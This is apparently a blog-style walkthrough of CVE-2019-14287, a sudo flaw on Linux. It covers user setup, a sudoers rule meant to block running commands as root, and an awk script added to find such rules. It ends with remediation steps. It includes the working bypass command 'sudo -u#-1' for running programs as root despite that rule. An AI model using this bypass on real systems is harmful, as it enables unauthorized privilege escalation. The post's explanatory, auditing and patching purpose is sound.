CVE-2019-14287 Linux sudo escalation of privileges

Create a user and make sure they're able to log in

Setup for logging in and executing tasks:

First you would have created a user:

useradd -m bob -G sudo -s /bin/bash
passwd bob

To be able to log in, you add to .profile (at the top):
vi .profile

Check who's in sudo with:

getent group sudo
groups bob



Edit the file sudoers

vi /etc/sudoers






Because bob is a member of sudo, he can perform administrative tasks.




2. Partial prevention with a user privilege specification

This doesn't help too much because of the flaw.

myhost operators =(ALL,!root) !ALL




To check which user executes this:

sudo -u#-1 id -u

To execute a command as root:

su root leafpad

This cannot be executed because of that rule.

But with the user's password it can be executed like this:

sudo -u#-1 leafpad
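
To find rules of the kind shown in this section, you can scan sudoers text for Runas user lists that combine ALL with a negated entry. The script below is an added example, not part of the original post; the function names and the sample input are constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the original post): list sudoers rules whose
# Runas *user* list combines ALL with a negated entry, e.g. (ALL,!root).
# Limits: does not join "\" continuation lines or expand Runas_Alias names.

find_negated_runas() {
    # Reads sudoers text on stdin, prints "lineno: rule" for each hit.
    awk '
        /^[ \t]*#?$/       { next }   # blank line or bare "#"
        /^[ \t]*#[^0-9]/   { next }   # comment or #include; "#1000" is a uid
        {
            rest = $0
            # Walk every parenthesised Runas spec on the line.
            while (match(rest, /\([^)]*\)/)) {
                users = "," substr(rest, RSTART + 1, RLENGTH - 2)
                sub(/:.*/, "", users)      # drop the group part after ":"
                users = users ","          # pad so ALL is always delimited
                if (users ~ /[, \t]ALL[, \t]/ && users ~ /!/) {
                    printf "%d: %s\n", NR, $0
                    break
                }
                rest = substr(rest, RSTART + RLENGTH)
            }
        }
    '
}

# Constructed sample input; lines 4 and 5 are the two rules quoted in this post.
sample_sudoers() {
    cat <<'EOF'
# constructed sample sudoers content
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
myhost operators =(ALL,!root) !ALL
%sudo ALL=(ALL:!operator) !ALL
bob     ALL=(alice) /usr/bin/id
EOF
}

sample_sudoers | find_negated_runas
```

To audit a real system, run find_negated_runas as root with /etc/sudoers and each file under /etc/sudoers.d on stdin.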




3. Remediation and Check Group Membership

You could add another line like this:

%sudo ALL=(ALL:!operator) !ALL




The result is that Bob cannot perform administrative tasks anymore.





But to avoid this strange setup altogether, you just need to make sure Bob doesn't have sudo rights.

groups root
groups bob

Add Bob to the operator group and remove him from sudo:
sudo usermod -a -G operator bob
groups bob
gpasswd -d bob sudo
groups bob




Result: Bob is no longer a member of sudo, cannot perform administrative tasks, and is just an operator.


Hardened Execution - Least Privileged




As you can see, it's wiser not to give users sudo rights.

And this flaw is history once you update your Linux system.


Thank you for reading.




